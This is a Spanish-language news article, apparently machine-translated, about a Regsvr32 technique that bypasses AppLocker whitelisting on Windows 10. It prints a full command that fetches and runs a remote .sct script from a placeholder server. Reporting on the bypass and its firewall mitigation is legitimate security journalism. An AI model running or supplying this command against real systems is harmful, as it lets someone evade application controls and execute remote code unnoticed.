Regsvr32 se puede usar para evitar el bloqueo de aplicaciones en Windows 10
Video: Cómo saltarse AppLocker en Windows 10 con BgInfo 2024
Un investigador de Colorado que se conoce con el nombre de Casey Smith, descubrió que Regsvr32 puede usarse para omitir AppLocker en Windows 10, y este es un gran problema para los usuarios de computadoras, especialmente aquellos en el entorno empresarial.
AppLocker se introdujo por primera vez en Windows 7 y Windows Server 2008 R2. Está diseñado para permitir a los administradores especificar qué grupo o usuarios pueden aprovechar algunas o todas las aplicaciones en función de la identidad única de los archivos. Si es una persona que tiende a usar AppLocker, debería ser de conocimiento común que se puede usar para crear ciertas reglas para permitir que las aplicaciones se ejecuten o las detengan en seco.
Para aquellos que no estén al tanto, Regvr32 se puede usar para registrar y anular el registro de DLL. Esta no es una herramienta de un solo clic, ya que es una utilidad de línea de comandos, por lo que solo los usuarios avanzados de computadoras deben tratar de aprovechar lo que tiene para ofrecer.
Entendemos que al usar esta técnica, no altera el registro del sistema informático, lo que dificulta que los administradores sepan si se han realizado cambios.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
"Lo sorprendente aquí es que regsvr32 ya es compatible con proxy, usa TLS, sigue redireccionamientos, etc. … Y … Adivinó un binario de MS predeterminado y firmado. Por lo tanto, todo lo que necesita hacer es alojar su archivo.sct en una ubicación que controle ", escribió Smith.
La técnica anterior no requiere privilegios administrativos y no altera el registro. Además, los scripts se pueden invocar a través de HTTP o HTTPS. Por el momento, Microsoft no ha lanzado un parche para este pequeño problema, por lo que la única opción en este momento es bloquear Regsvr32 a través del Firewall de Windows.
Curiosamente, el gigante del software aún no ha respondido sobre este problema de seguridad que enfrenta su sistema operativo. Ahora que está a la vista, esperamos escuchar algo de la compañía junto con conversaciones sobre un parche futuro.
Cómo habilitar el bloqueo de mayúsculas, el bloqueo numérico o la advertencia de bloqueo de desplazamiento en la PC
Estos son los pasos a seguir para habilitar las notificaciones Bloq Mayús, Bloq Num o Bloqueo de desplazamiento en su computadora con Windows 10.
Solución: las teclas de bloqueo de mayúsculas y de bloqueo numérico se atascan en Windows 10
Windows 10 es un gran sistema operativo, pero muchos usuarios informaron problemas atascados con las teclas Bloq Mayús y Bloq Num. Consulte esta guía y vea cómo solucionarlos.
Habilitar el bloqueo numérico para la pantalla de inicio de sesión y la pantalla de bloqueo en Windows 10: cómo
Windows 10 no habilita automáticamente NumLock para la pantalla de inicio de sesión. Siguiendo las líneas a continuación, configurará NumLock como habilitado por defecto.
